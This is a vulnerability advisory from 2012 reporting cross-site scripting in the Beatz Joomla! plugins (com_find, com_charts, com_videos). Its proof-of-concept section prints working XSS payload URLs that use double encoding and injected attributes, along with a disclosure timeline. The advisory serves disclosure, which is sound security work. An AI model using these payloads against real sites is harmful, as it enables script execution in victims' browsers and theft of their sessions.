1. OVERVIEW Beatz 1.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Beatz is a set of powerful Social Networking Script Joomla! 1.5 plugins that allows you to start your own favourite artist band website. Although it is just a Joomla! plugin, it comes with full Joolma! bundle for ease of use and installation. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized upon submission, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The vulnerable plugins include: com_find, com_charts and com_videos. 4. VERSIONS AFFECTED Tested in 1.x versions 5. PROOF-OF-CONCEPT/EXPLOIT == Generic Joomla! 1.5 Double Encoding XSS http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1 == com_charts (parameter: do) http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts == com_find (parameter: keyword) http://localhost/beatz/index.php?do=listAll&keyword=++Search">&option=com_find == com_videos (parameter: video_keyword) http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search 6. SOLUTION The vendor hasn't released the fixed yet. 7. VENDOR Cogzidel Technologies Pvt Ltd. http://www.cogzidel.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-01: notified vendor 2012-04-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss #yehg [2012-04-15]